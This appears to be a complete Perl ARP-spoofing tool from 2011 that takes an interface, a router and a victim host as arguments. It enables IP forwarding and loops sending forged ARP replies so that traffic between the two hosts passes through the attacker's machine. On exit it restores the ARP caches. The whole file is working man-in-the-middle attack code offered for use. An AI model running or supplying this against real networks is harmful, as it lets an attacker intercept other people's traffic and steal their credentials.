#!/usr/bin/perl

# Author: localh0t
# Date: 04/01/2011
# Contact: mattdch0@gmail.com
# Follow: @mattdch

# Net::ARP & Net::Ping required
use Net::ARP;
use Net::Ping;

# Root required

if ($< != 0)
{
	print "\n[!] Run it as root\n\n";
	exit(0);
}

# Help

if(!$ARGV[2])
	{
		 print "\n#####################################";
		 print "\n# Perl ARP-Spoofer v0.2 by localh0t #";
         	 print "\n#####################################";
		 print "\n\nUse: perl $0 [INTERFACE] [HOST 1 (Router)] [HOST 2 (Victim)]\n\n";
         	 exit(0);
	}

# End function

sub finaliza
	{
		print "\n\n[!] Restoring remote hosts ARP cache\n";
		# 2 packets per host to ensure the restoration
		print "\n[+] $host1 is-at $mac1 (to $host2)";
		Net::ARP::send_packet($dev, $host1, $host2, $mac1, $mac2, 'reply');
		Net::ARP::send_packet($dev, $host1, $host2, $mac1, $mac2, 'reply');
		print "\n[+] $host2 is-at $mac2 (to $host1)";
		Net::ARP::send_packet($dev, $host2, $host1, $mac2, $mac1, 'reply');
		Net::ARP::send_packet($dev, $host2, $host1, $mac2, $mac1, 'reply');

		print "\n\n[!] Disabling forwarding...";

		open(FORWD,">"."/proc/sys/net/ipv4/ip_forward") || die "\n[-] Error opening ip_forward";
		print FORWD "0";
		close(FORWD);

		system("iptables -P FORWARD DROP");

		print "\n[!] Exiting...\n\n";
		exit(0);
	}

($dev, $host1, $host2) = @ARGV;

# Main

print "\n[+] Perl ARP-Spoofer v0.2 starting [+]\n";

$lmac = Net::ARP::get_mac($dev);

print "\n[!] Local MAC : $lmac";

my $ping = Net::Ping->new('icmp');
   $ping->ping($host1, 2);
   $ping->ping($host2, 2);

$mac1 = Net::ARP::arp_lookup($dev,$host1);
$mac2 = Net::ARP::arp_lookup($dev,$host2);

print "\n[!] MAC Host 1: $mac1";
print "\n[!] MAC Host 2: $mac2";

print "\n\n[!] Enabling forwarding...";

open(FORWD,">"."/proc/sys/net/ipv4/ip_forward") || die "\n[-] Error opening ip_forward";
print FORWD "1";
close(FORWD);

system("iptables -P FORWARD ACCEPT");

print "\n\n[!] Starting ARP-Spoofing between $host1 & $host2, Ctrl-C to end...\n";

# (While not Crtl-C)

while(1)
{
	$SIG{INT} = \&finaliza;
	sleep(1);
	print "\n[+] $host1 is-at $lmac (to $host2)";
	Net::ARP::send_packet($dev, $host1, $host2, $lmac, $mac2, 'reply');
	print "\n[+] $host2 is-at $lmac (to $host1)";
	Net::ARP::send_packet($dev, $host2, $host1, $lmac, $mac1, 'reply');
}

__END__